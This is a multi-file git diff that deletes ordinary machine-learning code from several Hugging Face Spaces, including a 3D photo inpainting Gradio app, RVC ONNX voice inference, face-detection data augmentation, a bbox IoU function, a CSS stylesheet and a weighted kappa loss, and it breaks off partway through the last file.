-from mesh import write_ply, read_ply, output_3d_photo
-from utils import get_MiDaS_samples, read_MiDaS_depth
-import torch
-import cv2
-from skimage.transform import resize
-import imageio
-import copy
-from networks import Inpaint_Color_Net, Inpaint_Depth_Net, Inpaint_Edge_Net
-from MiDaS.run import run_depth
-from boostmonodepth_utils import run_boostmonodepth
-from MiDaS.monodepth_net import MonoDepthNet
-import MiDaS.MiDaS_utils as MiDaS_utils
-from bilateral_filtering import sparse_bilateral_filtering
-
-import torch
-
-# gradio imports
-import gradio as gr
-import uuid
-from PIL import Image
-from pathlib import Path
-import shutil
-from time import sleep
-
-def inpaint(img_name, num_frames, fps):
-
- config = yaml.load(open('argument.yml', 'r'))
-
- config['num_frames'] = num_frames
- config['fps'] = fps
-
- if torch.cuda.is_available():
- config['gpu_ids'] = 0
-
- if config['offscreen_rendering'] is True:
- vispy.use(app='egl')
-
- os.makedirs(config['mesh_folder'], exist_ok=True)
- os.makedirs(config['video_folder'], exist_ok=True)
- os.makedirs(config['depth_folder'], exist_ok=True)
- sample_list = get_MiDaS_samples(config['src_folder'], config['depth_folder'], config, config['specific'], img_name.stem)
- normal_canvas, all_canvas = None, None
-
- if isinstance(config["gpu_ids"], int) and (config["gpu_ids"] >= 0):
- device = config["gpu_ids"]
- else:
- device = "cpu"
-
- print(f"running on device {device}")
-
- for idx in tqdm(range(len(sample_list))):
- depth = None
- sample = sample_list[idx]
- print("Current Source ==> ", sample['src_pair_name'])
- mesh_fi = os.path.join(config['mesh_folder'], sample['src_pair_name'] +'.ply')
- image = imageio.imread(sample['ref_img_fi'])
-
- print(f"Running depth extraction at {time.time()}")
- if config['use_boostmonodepth'] is True:
- run_boostmonodepth(sample['ref_img_fi'], config['src_folder'], config['depth_folder'])
- elif config['require_midas'] is True:
- run_depth([sample['ref_img_fi']], config['src_folder'], config['depth_folder'],
- config['MiDaS_model_ckpt'], MonoDepthNet, MiDaS_utils, target_w=640)
-
- if 'npy' in config['depth_format']:
- config['output_h'], config['output_w'] = np.load(sample['depth_fi']).shape[:2]
- else:
- config['output_h'], config['output_w'] = imageio.imread(sample['depth_fi']).shape[:2]
- frac = config['longer_side_len'] / max(config['output_h'], config['output_w'])
- config['output_h'], config['output_w'] = int(config['output_h'] * frac), int(config['output_w'] * frac)
- config['original_h'], config['original_w'] = config['output_h'], config['output_w']
- if image.ndim == 2:
- image = image[..., None].repeat(3, -1)
- if np.sum(np.abs(image[..., 0] - image[..., 1])) == 0 and np.sum(np.abs(image[..., 1] - image[..., 2])) == 0:
- config['gray_image'] = True
- else:
- config['gray_image'] = False
- image = cv2.resize(image, (config['output_w'], config['output_h']), interpolation=cv2.INTER_AREA)
- depth = read_MiDaS_depth(sample['depth_fi'], 3.0, config['output_h'], config['output_w'])
- mean_loc_depth = depth[depth.shape[0]//2, depth.shape[1]//2]
- if not(config['load_ply'] is True and os.path.exists(mesh_fi)):
- vis_photos, vis_depths = sparse_bilateral_filtering(depth.copy(), image.copy(), config, num_iter=config['sparse_iter'], spdb=False)
- depth = vis_depths[-1]
- model = None
- torch.cuda.empty_cache()
- print("Start Running 3D_Photo ...")
- print(f"Loading edge model at {time.time()}")
- depth_edge_model = Inpaint_Edge_Net(init_weights=True)
- depth_edge_weight = torch.load(config['depth_edge_model_ckpt'],
- map_location=torch.device(device))
- depth_edge_model.load_state_dict(depth_edge_weight)
- depth_edge_model = depth_edge_model.to(device)
- depth_edge_model.eval()
-
- print(f"Loading depth model at {time.time()}")
- depth_feat_model = Inpaint_Depth_Net()
- depth_feat_weight = torch.load(config['depth_feat_model_ckpt'],
- map_location=torch.device(device))
- depth_feat_model.load_state_dict(depth_feat_weight, strict=True)
- depth_feat_model = depth_feat_model.to(device)
- depth_feat_model.eval()
- depth_feat_model = depth_feat_model.to(device)
- print(f"Loading rgb model at {time.time()}")
- rgb_model = Inpaint_Color_Net()
- rgb_feat_weight = torch.load(config['rgb_feat_model_ckpt'],
- map_location=torch.device(device))
- rgb_model.load_state_dict(rgb_feat_weight)
- rgb_model.eval()
- rgb_model = rgb_model.to(device)
- graph = None
-
-
- print(f"Writing depth ply (and basically doing everything) at {time.time()}")
- rt_info = write_ply(image,
- depth,
- sample['int_mtx'],
- mesh_fi,
- config,
- rgb_model,
- depth_edge_model,
- depth_edge_model,
- depth_feat_model)
-
- if rt_info is False:
- continue
- rgb_model = None
- color_feat_model = None
- depth_edge_model = None
- depth_feat_model = None
- torch.cuda.empty_cache()
- if config['save_ply'] is True or config['load_ply'] is True:
- verts, colors, faces, Height, Width, hFov, vFov = read_ply(mesh_fi)
- else:
- verts, colors, faces, Height, Width, hFov, vFov = rt_info
-
-
- print(f"Making video at {time.time()}")
- videos_poses, video_basename = copy.deepcopy(sample['tgts_poses']), sample['tgt_name']
- top = (config.get('original_h') // 2 - sample['int_mtx'][1, 2] * config['output_h'])
- left = (config.get('original_w') // 2 - sample['int_mtx'][0, 2] * config['output_w'])
- down, right = top + config['output_h'], left + config['output_w']
- border = [int(xx) for xx in [top, down, left, right]]
- normal_canvas, all_canvas = output_3d_photo(verts.copy(), colors.copy(), faces.copy(), copy.deepcopy(Height), copy.deepcopy(Width), copy.deepcopy(hFov), copy.deepcopy(vFov),
- copy.deepcopy(sample['tgt_pose']), sample['video_postfix'], copy.deepcopy(sample['ref_pose']), copy.deepcopy(config['video_folder']),
- image.copy(), copy.deepcopy(sample['int_mtx']), config, image,
- videos_poses, video_basename, config.get('original_h'), config.get('original_w'), border=border, depth=depth, normal_canvas=normal_canvas, all_canvas=all_canvas,
- mean_loc_depth=mean_loc_depth)
-
-def resizer(input_img, max_img_size=512):
- width, height = input_img.size
- long_edge = height if height >= width else width
- if long_edge > max_img_size:
- ratio = max_img_size / long_edge
- resized_width = int(ratio * width)
- resized_height = int(ratio * height)
- resized_input_img = input_img.resize((resized_width, resized_height), resample=2)
- return resized_input_img
-
- else:
- return input_img
-
-def main_app(input_img, num_frames, fps):
-
- # resize down
- input_img = resizer(input_img)
-
- # Save image in necessary folder for inpainting
- #img_name = Path(str(uuid.uuid4()) + '.jpg')
- img_name = Path('sample.jpg')
- save_folder = Path('image')
- input_img.save(save_folder/img_name)
-
- inpaint(img_name, num_frames, fps)
-
- #subprocess.run('ls -l', shell=True)
- #subprocess.run('ls image -l', shell=True)
- #subprocess.run('ls video/ -l', shell=True)
-
- # Get output video path & return
- input_img_path = str(save_folder/img_name)
- out_vid_path = 'video/{0}_zoom-in.mp4'.format(img_name.stem)
-
- return out_vid_path
-
-video_choices = ['dolly-zoom-in', 'zoom-in', 'circle', 'swing']
-gradio_inputs = [gr.Image(type='pil', label='Input Image'),
- gr.Slider(minimum=60, maximum=240, step=1, default=120, label="Number of Frames"),
- gr.Slider(minimum=10, maximum=40, step=1, default=20, label="Frames per Second (FPS)")]
-
-gradio_outputs = [gr.Video(label='Output Video')]
-examples = [ ['moon.jpg', 60, 10], ['dog.jpg', 60, 10] ]
-
-description="Convert an image into a trajectory-following video. Images are automatically resized down to a max edge of 512. | NOTE: The current runtime for a sample is around 400-700 seconds. Running on a lower number of frames could help! Do be patient as this is on CPU-only, BUT if this space maybe gets a GPU one day, it's already configured to run with GPU-support :) If you have a GPU, feel free to use the author's original repo (linked at the bottom of this path, they have a collab notebook!) You can also run this space/gradio app locally!"
-
-article = "3D Photography using Context-aware Layered Depth Inpainting | Github Project Page | Github Repo
"
-
-iface = gr.Interface(fn=main_app, inputs=gradio_inputs , outputs=gradio_outputs, examples=examples,
- title='3D Image Inpainting',
- description=description,
- article=article,
- allow_flagging='never',
- theme="default",
- cache_examples=False).launch(enable_queue=True, debug=True)
diff --git a/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py b/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py
deleted file mode 100644
index c78324cbc08414fffcc689f325312de0e51bd6b4..0000000000000000000000000000000000000000
--- a/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py
+++ /dev/null
@@ -1,143 +0,0 @@
-import onnxruntime
-import librosa
-import numpy as np
-import soundfile
-
-
-class ContentVec:
- def __init__(self, vec_path="pretrained/vec-768-layer-12.onnx", device=None):
- print("load model(s) from {}".format(vec_path))
- if device == "cpu" or device is None:
- providers = ["CPUExecutionProvider"]
- elif device == "cuda":
- providers = ["CUDAExecutionProvider", "CPUExecutionProvider"]
- elif device == "dml":
- providers = ["DmlExecutionProvider"]
- else:
- raise RuntimeError("Unsportted Device")
- self.model = onnxruntime.InferenceSession(vec_path, providers=providers)
-
- def __call__(self, wav):
- return self.forward(wav)
-
- def forward(self, wav):
- feats = wav
- if feats.ndim == 2: # double channels
- feats = feats.mean(-1)
- assert feats.ndim == 1, feats.ndim
- feats = np.expand_dims(np.expand_dims(feats, 0), 0)
- onnx_input = {self.model.get_inputs()[0].name: feats}
- logits = self.model.run(None, onnx_input)[0]
- return logits.transpose(0, 2, 1)
-
-
-def get_f0_predictor(f0_predictor, hop_length, sampling_rate, **kargs):
- if f0_predictor == "pm":
- from lib.infer_pack.modules.F0Predictor.PMF0Predictor import PMF0Predictor
-
- f0_predictor_object = PMF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- elif f0_predictor == "harvest":
- from lib.infer_pack.modules.F0Predictor.HarvestF0Predictor import HarvestF0Predictor
-
- f0_predictor_object = HarvestF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- elif f0_predictor == "dio":
- from lib.infer_pack.modules.F0Predictor.DioF0Predictor import DioF0Predictor
-
- f0_predictor_object = DioF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- else:
- raise Exception("Unknown f0 predictor")
- return f0_predictor_object
-
-
-class OnnxRVC:
- def __init__(
- self,
- model_path,
- sr=40000,
- hop_size=512,
- vec_path="vec-768-layer-12",
- device="cpu",
- ):
- vec_path = f"pretrained/{vec_path}.onnx"
- self.vec_model = ContentVec(vec_path, device)
- if device == "cpu" or device is None:
- providers = ["CPUExecutionProvider"]
- elif device == "cuda":
- providers = ["CUDAExecutionProvider", "CPUExecutionProvider"]
- elif device == "dml":
- providers = ["DmlExecutionProvider"]
- else:
- raise RuntimeError("Unsportted Device")
- self.model = onnxruntime.InferenceSession(model_path, providers=providers)
- self.sampling_rate = sr
- self.hop_size = hop_size
-
- def forward(self, hubert, hubert_length, pitch, pitchf, ds, rnd):
- onnx_input = {
- self.model.get_inputs()[0].name: hubert,
- self.model.get_inputs()[1].name: hubert_length,
- self.model.get_inputs()[2].name: pitch,
- self.model.get_inputs()[3].name: pitchf,
- self.model.get_inputs()[4].name: ds,
- self.model.get_inputs()[5].name: rnd,
- }
- return (self.model.run(None, onnx_input)[0] * 32767).astype(np.int16)
-
- def inference(
- self,
- raw_path,
- sid,
- f0_method="dio",
- f0_up_key=0,
- pad_time=0.5,
- cr_threshold=0.02,
- ):
- f0_min = 50
- f0_max = 1100
- f0_mel_min = 1127 * np.log(1 + f0_min / 700)
- f0_mel_max = 1127 * np.log(1 + f0_max / 700)
- f0_predictor = get_f0_predictor(
- f0_method,
- hop_length=self.hop_size,
- sampling_rate=self.sampling_rate,
- threshold=cr_threshold,
- )
- wav, sr = librosa.load(raw_path, sr=self.sampling_rate)
- org_length = len(wav)
- if org_length / sr > 50.0:
- raise RuntimeError("Reached Max Length")
-
- wav16k = librosa.resample(wav, orig_sr=self.sampling_rate, target_sr=16000)
- wav16k = wav16k
-
- hubert = self.vec_model(wav16k)
- hubert = np.repeat(hubert, 2, axis=2).transpose(0, 2, 1).astype(np.float32)
- hubert_length = hubert.shape[1]
-
- pitchf = f0_predictor.compute_f0(wav, hubert_length)
- pitchf = pitchf * 2 ** (f0_up_key / 12)
- pitch = pitchf.copy()
- f0_mel = 1127 * np.log(1 + pitch / 700)
- f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (
- f0_mel_max - f0_mel_min
- ) + 1
- f0_mel[f0_mel <= 1] = 1
- f0_mel[f0_mel > 255] = 255
- pitch = np.rint(f0_mel).astype(np.int64)
-
- pitchf = pitchf.reshape(1, len(pitchf)).astype(np.float32)
- pitch = pitch.reshape(1, len(pitch))
- ds = np.array([sid]).astype(np.int64)
-
- rnd = np.random.randn(1, 192, hubert_length).astype(np.float32)
- hubert_length = np.array([hubert_length]).astype(np.int64)
-
- out_wav = self.forward(hubert, hubert_length, pitch, pitchf, ds, rnd).squeeze()
- out_wav = np.pad(out_wav, (0, 2 * self.hop_size), "constant")
- return out_wav[0:org_length]
diff --git a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css b/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css
deleted file mode 100644
index 4705139f87d3625c43bb688c9e62d200a956f57a..0000000000000000000000000000000000000000
--- a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css
+++ /dev/null
@@ -1,67 +0,0 @@
-
-/* 解决container=False时的错误填充 */
-div.form {
- background: none !important;
-}
-div.no-container {
- padding: 10px 0 0 0 !important;
-}
-
-/* gradio的页脚信息 */
-footer {
- /* display: none !important; */
- margin-top: .2em !important;
- font-size: 85%;
-}
-
-/* 覆盖 gradio 丑陋的复制按钮样式 */
-.message pre button[title="copy"] {
- border-radius: 5px;
- transition: background-color .2s ease;
-}
-.message pre button[title="copy"]:hover {
- background-color: #333232;
-}
-.message pre button .check {
- color: #fff !important;
- background: var(--neutral-950) !important;
-}
-
-
-
-
-/* Override Slider Styles (for webkit browsers like Safari and Chrome)
- * 好希望这份提案能早日实现 https://github.com/w3c/csswg-drafts/issues/4410
- * 进度滑块在各个平台还是太不统一了
-**/
-
-input[type="range"] {
- /* -webkit-appearance: none; */
- appearance: none;
- height: 4px;
- background: var(--input-background-fill);
- border-radius: 5px;
- background-image: linear-gradient(var(--primary-500),var(--primary-500));
- background-size: 0% 100%;
- background-repeat: no-repeat;
-}
-input[type="range"]::-webkit-slider-thumb {
- -webkit-appearance: none;
- height: 20px;
- width: 20px;
- border-radius: 50%;
- border: solid 0.5px #ddd;
- background-color: white;
- cursor: ew-resize;
- box-shadow: var(--input-shadow);
- transition: background-color .1s ease;
-}
-input[type="range"]::-webkit-slider-thumb:hover {
- background: var(--neutral-50);
-}
-input[type=range]::-webkit-slider-runnable-track {
- -webkit-appearance: none;
- box-shadow: none;
- border: none;
- background: transparent;
-}
diff --git a/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py b/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py
deleted file mode 100644
index c1b52ae19bf8d9ac3fa256b68730ce1b556c6d6e..0000000000000000000000000000000000000000
--- a/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py
+++ /dev/null
@@ -1,237 +0,0 @@
-import cv2
-import numpy as np
-import random
-from utils.box_utils import matrix_iof
-
-
-def _crop(image, boxes, labels, landm, img_dim):
- height, width, _ = image.shape
- pad_image_flag = True
-
- for _ in range(250):
- """
- if random.uniform(0, 1) <= 0.2:
- scale = 1.0
- else:
- scale = random.uniform(0.3, 1.0)
- """
- PRE_SCALES = [0.3, 0.45, 0.6, 0.8, 1.0]
- scale = random.choice(PRE_SCALES)
- short_side = min(width, height)
- w = int(scale * short_side)
- h = w
-
- if width == w:
- l = 0
- else:
- l = random.randrange(width - w)
- if height == h:
- t = 0
- else:
- t = random.randrange(height - h)
- roi = np.array((l, t, l + w, t + h))
-
- value = matrix_iof(boxes, roi[np.newaxis])
- flag = (value >= 1)
- if not flag.any():
- continue
-
- centers = (boxes[:, :2] + boxes[:, 2:]) / 2
- mask_a = np.logical_and(roi[:2] < centers, centers < roi[2:]).all(axis=1)
- boxes_t = boxes[mask_a].copy()
- labels_t = labels[mask_a].copy()
- landms_t = landm[mask_a].copy()
- landms_t = landms_t.reshape([-1, 5, 2])
-
- if boxes_t.shape[0] == 0:
- continue
-
- image_t = image[roi[1]:roi[3], roi[0]:roi[2]]
-
- boxes_t[:, :2] = np.maximum(boxes_t[:, :2], roi[:2])
- boxes_t[:, :2] -= roi[:2]
- boxes_t[:, 2:] = np.minimum(boxes_t[:, 2:], roi[2:])
- boxes_t[:, 2:] -= roi[:2]
-
- # landm
- landms_t[:, :, :2] = landms_t[:, :, :2] - roi[:2]
- landms_t[:, :, :2] = np.maximum(landms_t[:, :, :2], np.array([0, 0]))
- landms_t[:, :, :2] = np.minimum(landms_t[:, :, :2], roi[2:] - roi[:2])
- landms_t = landms_t.reshape([-1, 10])
-
-
- # make sure that the cropped image contains at least one face > 16 pixel at training image scale
- b_w_t = (boxes_t[:, 2] - boxes_t[:, 0] + 1) / w * img_dim
- b_h_t = (boxes_t[:, 3] - boxes_t[:, 1] + 1) / h * img_dim
- mask_b = np.minimum(b_w_t, b_h_t) > 0.0
- boxes_t = boxes_t[mask_b]
- labels_t = labels_t[mask_b]
- landms_t = landms_t[mask_b]
-
- if boxes_t.shape[0] == 0:
- continue
-
- pad_image_flag = False
-
- return image_t, boxes_t, labels_t, landms_t, pad_image_flag
- return image, boxes, labels, landm, pad_image_flag
-
-
-def _distort(image):
-
- def _convert(image, alpha=1, beta=0):
- tmp = image.astype(float) * alpha + beta
- tmp[tmp < 0] = 0
- tmp[tmp > 255] = 255
- image[:] = tmp
-
- image = image.copy()
-
- if random.randrange(2):
-
- #brightness distortion
- if random.randrange(2):
- _convert(image, beta=random.uniform(-32, 32))
-
- #contrast distortion
- if random.randrange(2):
- _convert(image, alpha=random.uniform(0.5, 1.5))
-
- image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
-
- #saturation distortion
- if random.randrange(2):
- _convert(image[:, :, 1], alpha=random.uniform(0.5, 1.5))
-
- #hue distortion
- if random.randrange(2):
- tmp = image[:, :, 0].astype(int) + random.randint(-18, 18)
- tmp %= 180
- image[:, :, 0] = tmp
-
- image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
-
- else:
-
- #brightness distortion
- if random.randrange(2):
- _convert(image, beta=random.uniform(-32, 32))
-
- image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
-
- #saturation distortion
- if random.randrange(2):
- _convert(image[:, :, 1], alpha=random.uniform(0.5, 1.5))
-
- #hue distortion
- if random.randrange(2):
- tmp = image[:, :, 0].astype(int) + random.randint(-18, 18)
- tmp %= 180
- image[:, :, 0] = tmp
-
- image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
-
- #contrast distortion
- if random.randrange(2):
- _convert(image, alpha=random.uniform(0.5, 1.5))
-
- return image
-
-
-def _expand(image, boxes, fill, p):
- if random.randrange(2):
- return image, boxes
-
- height, width, depth = image.shape
-
- scale = random.uniform(1, p)
- w = int(scale * width)
- h = int(scale * height)
-
- left = random.randint(0, w - width)
- top = random.randint(0, h - height)
-
- boxes_t = boxes.copy()
- boxes_t[:, :2] += (left, top)
- boxes_t[:, 2:] += (left, top)
- expand_image = np.empty(
- (h, w, depth),
- dtype=image.dtype)
- expand_image[:, :] = fill
- expand_image[top:top + height, left:left + width] = image
- image = expand_image
-
- return image, boxes_t
-
-
-def _mirror(image, boxes, landms):
- _, width, _ = image.shape
- if random.randrange(2):
- image = image[:, ::-1]
- boxes = boxes.copy()
- boxes[:, 0::2] = width - boxes[:, 2::-2]
-
- # landm
- landms = landms.copy()
- landms = landms.reshape([-1, 5, 2])
- landms[:, :, 0] = width - landms[:, :, 0]
- tmp = landms[:, 1, :].copy()
- landms[:, 1, :] = landms[:, 0, :]
- landms[:, 0, :] = tmp
- tmp1 = landms[:, 4, :].copy()
- landms[:, 4, :] = landms[:, 3, :]
- landms[:, 3, :] = tmp1
- landms = landms.reshape([-1, 10])
-
- return image, boxes, landms
-
-
-def _pad_to_square(image, rgb_mean, pad_image_flag):
- if not pad_image_flag:
- return image
- height, width, _ = image.shape
- long_side = max(width, height)
- image_t = np.empty((long_side, long_side, 3), dtype=image.dtype)
- image_t[:, :] = rgb_mean
- image_t[0:0 + height, 0:0 + width] = image
- return image_t
-
-
-def _resize_subtract_mean(image, insize, rgb_mean):
- interp_methods = [cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_NEAREST, cv2.INTER_LANCZOS4]
- interp_method = interp_methods[random.randrange(5)]
- image = cv2.resize(image, (insize, insize), interpolation=interp_method)
- image = image.astype(np.float32)
- image -= rgb_mean
- return image.transpose(2, 0, 1)
-
-
-class preproc(object):
-
- def __init__(self, img_dim, rgb_means):
- self.img_dim = img_dim
- self.rgb_means = rgb_means
-
- def __call__(self, image, targets):
- assert targets.shape[0] > 0, "this image does not have gt"
-
- boxes = targets[:, :4].copy()
- labels = targets[:, -1].copy()
- landm = targets[:, 4:-1].copy()
-
- image_t, boxes_t, labels_t, landm_t, pad_image_flag = _crop(image, boxes, labels, landm, self.img_dim)
- image_t = _distort(image_t)
- image_t = _pad_to_square(image_t,self.rgb_means, pad_image_flag)
- image_t, boxes_t, landm_t = _mirror(image_t, boxes_t, landm_t)
- height, width, _ = image_t.shape
- image_t = _resize_subtract_mean(image_t, self.img_dim, self.rgb_means)
- boxes_t[:, 0::2] /= width
- boxes_t[:, 1::2] /= height
-
- landm_t[:, 0::2] /= width
- landm_t[:, 1::2] /= height
-
- labels_t = np.expand_dims(labels_t, 1)
- targets_t = np.hstack((boxes_t, landm_t, labels_t))
-
- return image_t, targets_t
diff --git a/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py b/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py
deleted file mode 100644
index 5d6eb82fcfc8d5444dd2a13b7d95b978f8206a55..0000000000000000000000000000000000000000
--- a/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py
+++ /dev/null
@@ -1,65 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-import numpy as np
-
-
-def bbox_overlaps(bboxes1,
- bboxes2,
- mode='iou',
- eps=1e-6,
- use_legacy_coordinate=False):
- """Calculate the ious between each bbox of bboxes1 and bboxes2.
-
- Args:
- bboxes1 (ndarray): Shape (n, 4)
- bboxes2 (ndarray): Shape (k, 4)
- mode (str): IOU (intersection over union) or IOF (intersection
- over foreground)
- use_legacy_coordinate (bool): Whether to use coordinate system in
- mmdet v1.x. which means width, height should be
- calculated as 'x2 - x1 + 1` and 'y2 - y1 + 1' respectively.
- Note when function is used in `VOCDataset`, it should be
- True to align with the official implementation
- `http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCdevkit_18-May-2011.tar`
- Default: False.
-
- Returns:
- ious (ndarray): Shape (n, k)
- """
-
- assert mode in ['iou', 'iof']
- if not use_legacy_coordinate:
- extra_length = 0.
- else:
- extra_length = 1.
- bboxes1 = bboxes1.astype(np.float32)
- bboxes2 = bboxes2.astype(np.float32)
- rows = bboxes1.shape[0]
- cols = bboxes2.shape[0]
- ious = np.zeros((rows, cols), dtype=np.float32)
- if rows * cols == 0:
- return ious
- exchange = False
- if bboxes1.shape[0] > bboxes2.shape[0]:
- bboxes1, bboxes2 = bboxes2, bboxes1
- ious = np.zeros((cols, rows), dtype=np.float32)
- exchange = True
- area1 = (bboxes1[:, 2] - bboxes1[:, 0] + extra_length) * (
- bboxes1[:, 3] - bboxes1[:, 1] + extra_length)
- area2 = (bboxes2[:, 2] - bboxes2[:, 0] + extra_length) * (
- bboxes2[:, 3] - bboxes2[:, 1] + extra_length)
- for i in range(bboxes1.shape[0]):
- x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])
- y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])
- x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])
- y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])
- overlap = np.maximum(x_end - x_start + extra_length, 0) * np.maximum(
- y_end - y_start + extra_length, 0)
- if mode == 'iou':
- union = area1[i] + area2 - overlap
- else:
- union = area1[i] if not exchange else area2
- union = np.maximum(union, eps)
- ious[i, :] = overlap / union
- if exchange:
- ious = ious.T
- return ious
diff --git a/spaces/LawalAfeez/science-lab/embed.py b/spaces/LawalAfeez/science-lab/embed.py
deleted file mode 100644
index 29e975a0fab1fd2fd4ccd71aec4b9da6949b92e5..0000000000000000000000000000000000000000
--- a/spaces/LawalAfeez/science-lab/embed.py
+++ /dev/null
@@ -1,28 +0,0 @@
-from transformers import AutoTokenizer,TFAutoModel
-import torch
-from torch import nn
-import tensorflow
-
-
-
-model_ckpt = "sentence-transformers/multi-qa-mpnet-base-dot-v1"
-
-tokenizer=AutoTokenizer.from_pretrained(model_ckpt)
-
-model=TFAutoModel.from_pretrained(model_ckpt,from_pt=True)
-
-
-def cls_pool(model):
-
- return model.last_hidden_state[:,0,:]
-
-def sample_embedding(example):
-
- token_output=tokenizer(example,padding=True,truncation=True,return_tensors="tf")
-
- token_output={k:v for k,v in token_output.items()}
-
-
- model_output=model(**token_output)
-
- return {"embedding":cls_pool(model_output).numpy()[0]}
diff --git a/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py b/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py
deleted file mode 100644
index b1cbbecadaec824d20e68d0fe1ea083531102701..0000000000000000000000000000000000000000
--- a/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8; py-indent-offset:4 -*-
-###############################################################################
-#
-# Copyright (C) 2015-2020 Daniel Rodriguez
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-###############################################################################
-from __future__ import (absolute_import, division, print_function,
- unicode_literals)
-
diff --git a/spaces/MBA98/DiabeticRetinopathyDetection/app.py b/spaces/MBA98/DiabeticRetinopathyDetection/app.py
deleted file mode 100644
index 6d75d9ed7198ef111deeeb17a9c060206fc96384..0000000000000000000000000000000000000000
--- a/spaces/MBA98/DiabeticRetinopathyDetection/app.py
+++ /dev/null
@@ -1,733 +0,0 @@
-import gradio as gr
-import cv2
-import numpy as np
-import tensorflow as tf
-import tensorflow_addons as tfa
-
-# Imported
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Weighted kappa loss."""
-
-from typing import Optional
-
-import tensorflow as tf
-from typeguard import typechecked
-
-from tensorflow_addons.utils.types import Number
-
-
-@tf.keras.utils.register_keras_serializable(package="Addons")
-class WeightedKappaLoss(tf.keras.losses.Loss):
- r"""Implements the Weighted Kappa loss function.
-
- Weighted Kappa loss was introduced in the
- [Weighted kappa loss function for multi-class classification
- of ordinal data in deep learning]
- (https://www.sciencedirect.com/science/article/abs/pii/S0167865517301666).
- Weighted Kappa is widely used in Ordinal Classification Problems.
- The loss value lies in $ [-\infty, \log 2] $, where $ \log 2 $
- means the random prediction.
-
- Usage:
-
- >>> kappa_loss = tfa.losses.WeightedKappaLoss(num_classes=4)
- >>> y_true = tf.constant([[0, 0, 1, 0], [0, 1, 0, 0],
- ... [1, 0, 0, 0], [0, 0, 0, 1]])
- >>> y_pred = tf.constant([[0.1, 0.2, 0.6, 0.1], [0.1, 0.5, 0.3, 0.1],
- ... [0.8, 0.05, 0.05, 0.1], [0.01, 0.09, 0.1, 0.8]])
- >>> loss = kappa_loss(y_true, y_pred)
- >>> loss
-
-
- Usage with `tf.keras` API:
-
- >>> model = tf.keras.Model()
- >>> model.compile('sgd', loss=tfa.losses.WeightedKappaLoss(num_classes=4))
-
- <... outputs should be softmax results
- if you want to weight the samples, just multiply the outputs
- by the sample weight ...>
-
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: int,
- weightage: Optional[str] = "quadratic",
- name: Optional[str] = "cohen_kappa_loss",
- epsilon: Optional[Number] = 1e-6,
- reduction: str = tf.keras.losses.Reduction.NONE,
- ):
- r"""Creates a `WeightedKappaLoss` instance.
-
- Args:
- num_classes: Number of unique classes in your dataset.
- weightage: (Optional) Weighting to be considered for calculating
- kappa statistics. A valid value is one of
- ['linear', 'quadratic']. Defaults to 'quadratic'.
- name: (Optional) String name of the metric instance.
- epsilon: (Optional) increment to avoid log zero,
- so the loss will be $ \log(1 - k + \epsilon) $, where $ k $ lies
- in $ [-1, 1] $. Defaults to 1e-6.
- Raises:
- ValueError: If the value passed for `weightage` is invalid
- i.e. not any one of ['linear', 'quadratic']
- """
-
- super().__init__(name=name, reduction=reduction)
-
- if weightage not in ("linear", "quadratic"):
- raise ValueError("Unknown kappa weighting type.")
-
- self.weightage = weightage
- self.num_classes = num_classes
- self.epsilon = epsilon or tf.keras.backend.epsilon()
- label_vec = tf.range(num_classes, dtype=tf.keras.backend.floatx())
- self.row_label_vec = tf.reshape(label_vec, [1, num_classes])
- self.col_label_vec = tf.reshape(label_vec, [num_classes, 1])
- col_mat = tf.tile(self.col_label_vec, [1, num_classes])
- row_mat = tf.tile(self.row_label_vec, [num_classes, 1])
- if weightage == "linear":
- self.weight_mat = tf.abs(col_mat - row_mat)
- else:
